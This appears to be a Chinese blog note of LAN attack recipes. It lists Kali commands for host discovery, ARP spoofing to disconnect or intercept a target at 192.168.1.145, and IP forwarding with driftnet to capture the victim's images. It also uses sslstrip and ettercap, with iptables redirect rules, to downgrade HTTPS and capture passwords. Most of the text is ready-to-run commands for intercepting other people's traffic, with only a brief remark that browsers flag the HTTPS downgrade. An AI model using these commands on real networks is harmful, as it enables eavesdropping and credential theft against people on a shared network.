局域网攻击笔记

攻击环境 kali虚拟机
网卡 eth0
目标ip 192.168.1.145
网关 192.168.1.1

1. 寻找局域网其他主机

fping  -asg  192.168.1.0/24

2.局域网断网攻击

arpspoof -i 网关  -t  目标ip 网关
arpspoof -i eth0 -t 192.168.1.145 192.168.1.1

原理

目标--> 我的网卡--> 网关

可能发生arpspoof: couldn't arp for host 错误:

  • 保证虚拟机和目标主机可以ping的通
  • 换成桥接模式

3. 获取图片

先ip转发

echo 1 >/proc/sys/net/ipv4/ip_forward

再欺骗

arpspoof -i eth0 -t 192.168.1.145 192.168.1.1

再开启相应程序获取图片密码等

driftnet -i eth0 

driftnet --> 获取本地网卡的图片

4. 查看http(s)密码

工具:arpspoof、ettercap、sslstrip

编辑etter.conf文件,启用linux的iptables(如果是HTTPS需要此步骤,HTTP不需要);

vim /etc/ettercap/etter.conf
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

开启数据转发:

echo 1 > /proc/sys/net/ipv4/ip_forward

开启Arp欺骗:

arpspoof -i eth0 -t 192.168.0.78 192.168.0.254

将HTTPS还原为HTTP

sslstrip -a -f -k    

(缺点:容易出现证书错误)

开始抓包:

ettercap -Tq -i eth0

注:实际测试中,http协议可以正常抓取,但是https协议情况下,所有主流现代浏览器都发出安全警示,并禁止继续访问。

1 + 6 =
快来做第一个评论的人吧~